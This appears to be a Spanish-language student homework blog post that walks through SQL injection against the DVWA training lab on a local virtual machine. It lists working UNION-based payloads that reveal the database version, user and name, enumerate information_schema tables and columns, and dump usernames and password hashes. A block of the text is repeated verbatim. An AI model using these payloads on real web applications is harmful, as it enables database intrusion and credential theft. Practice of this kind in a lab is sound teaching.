UNIDAD II - Tarea #02
TAREA 2: SQL injection
Usa la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos.
Al iniciar la maquina virtual nos arroja la IP eth0 : 192.168.56.101
Debemos ingresar esa IP en nuestro navegador y logearnos.
user: admin
pw: password
IMG1
Al ingresar nos dirigimos en al boton "DVWA Security", para cambiar el nivel de sguridad a "low" y click en Submit.
IMG2
Luego nos vamos a "SQL Injection", para realizar las pruebas.
Iniciamos la Inyección Básica.
Ingresamos "1" y Enviar.
IMG2
Esta es la instrucción que estaremos explotando:
$ getId = "SELECT first_name, last_name FROM usuarios WHERE user_id = '$ id'";
Escenario siempre cierto – Always True Scenario
Sentencia :
mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0′;
Ingresar : %’ or ‘0’=’0
Mostrar versión Base de Datos – Display Database Version
En busca de la versión de la base de datos Mysql.
Sentencia :
%’ or 0=0 union select null, version() #
Mostrar usuario de la Base de Datos – Display Database User
En la última línea PHP y obtenemos el nombre de usuario.
Sentencia :
%’ or 0=0 union select null, user() #
Mostrar nombre Base de Datos – Display Database Name
Al final nos imprime surname: " dvwa" el nombre de la base de datos.
Sentencia :
%’ or 0=0 union select null, database() #
Mostrar todas las tablas de information_schema – Display all tables in information_schema
Information_schema es la base de datos de información, el lugar que almacena información acerca de todas las otras bases de datos que el servidor
MySQL mantiene.
Sentencia :
%’ and 1=0 union select null, table_name from information_schema.tables #
Mostrar todas las tablas de user en information_schema –
Display all the user tables in information_schema
Se muestran todas las tablas que comienzan con “user” en la DB gracias a "information_schema".
Sentencia :
%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#
Mostrar todos los campos de columnas
en la tabla user en information_schema
Se muestran todas las columnas de la tabla de usuarios.
Sentencia :
%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ #
Mostrar todos los contenidos de campo de columnas en la tabla de usuario
en information_schema
Información de autenticación para el ingreso a la base de datos.
Sentencia :
%’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
POST FUENTE de GUÍA
Information_schema es la base de datos de información, el lugar que almacena información acerca de todas las otras bases de datos que el servidor
MySQL mantiene.
Sentencia :
%’ and 1=0 union select null, table_name from information_schema.tables #
Mostrar todas las tablas de user en information_schema –
Display all the user tables in information_schema
Se muestran todas las tablas que comienzan con “user” en la DB gracias a "information_schema".
Sentencia :
%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#
Mostrar todos los campos de columnas
en la tabla user en information_schema
Se muestran todas las columnas de la tabla de usuarios.
Sentencia :
%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ #
Mostrar todos los contenidos de campo de columnas en la tabla de usuario
en information_schema
Información de autenticación para el ingreso a la base de datos.
Sentencia :
%’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
POST FUENTE de GUÍA
No hay comentarios:
Publicar un comentario